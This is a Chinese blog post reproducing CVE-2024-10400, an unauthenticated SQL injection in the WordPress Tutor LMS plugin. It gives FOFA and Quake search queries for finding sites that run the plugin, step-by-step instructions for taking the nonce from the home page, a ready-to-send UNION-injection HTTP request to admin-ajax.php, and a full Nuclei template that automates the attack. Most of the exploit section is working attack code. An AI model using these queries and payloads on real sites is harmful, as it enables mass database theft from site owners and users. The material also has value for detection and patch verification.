【漏洞复现】CVE-2024-10400

发布于 作者:

【漏洞复现】CVE-2024-10400

混子Hacker 混子Hacker 2024-12-25 07:57

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。


漏洞简介 
]

——  
平凡是生活的本色,不凡是生命的追求

——

CVE-2024-10400

WordPress 的 Tutor LMS 插件在 2.7.6 及 2.7.6 之前的所有版本中存在通过 “rating_filter ”参数进行 SQL 注入的漏洞,原因是用户提供的参数未进行充分的转义处理,而且现有的 SQL 查询也未进行预编译。这使得未经认证的攻击者有可能在已有的查询中附加额外的 SQL 查询,从而从数据库中提取敏感信息。

影响范围
Tutor LMS <= 2.7.6

漏洞评分

7.5

利用条件

用户认证


利用难度


所需权限

解决方案

已发布

漏洞信息

混子Hacker

01

资产测绘 

fofa: body="/wp-content/plugins/tutor/"
Quake:body:"/wp-content/plugins/tutor/" 

# 风里雨里,我都在quake等你。个人中心输入邀请码“lnBNF0”你我均可获得5,000长效积分哦,地址 quake.360.net

混子Hacker**

02

漏洞复现

1、访问首页获取,_tutor_nonce值

2、带上_tutor_nonce值访问/wp-admin/admin-ajax.php 

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 166

action=load_filtered_instructor&_tutor_nonce=faf2dbeb1c&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5(999999999),version()),11,12,14--+-

混子Hacker**

03

Nuclei Poc 

id: CVE-2024-10400

info:
  name: Tutor LMS <= 2.7.6 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the ‘rating_filter’ parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor/tutor-lms-276-unauthenticated-sql-injection-via-rating-filter
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-10400
    cwe-id: CWE-89
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/tutor/"
    fofa-query: body="/wp-content/plugins/tutor/"
  tags: cve,cve2024,tutor-lms,lms,sqli

variables:
  num: '999999999'

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - '"_tutor_nonce":"([a-z0-9]+)"'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=load_filtered_instructor&_tutor_nonce={{nonce}}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5({{num}}),version()),11,12,14--+-

    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
          - '"success":true'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'alt=\\".*?:(.*?)\\"'

<<<  
END 

原创文章|转载请附上原文出处链接

更多漏洞|关注作者查看

作者|混子Hacker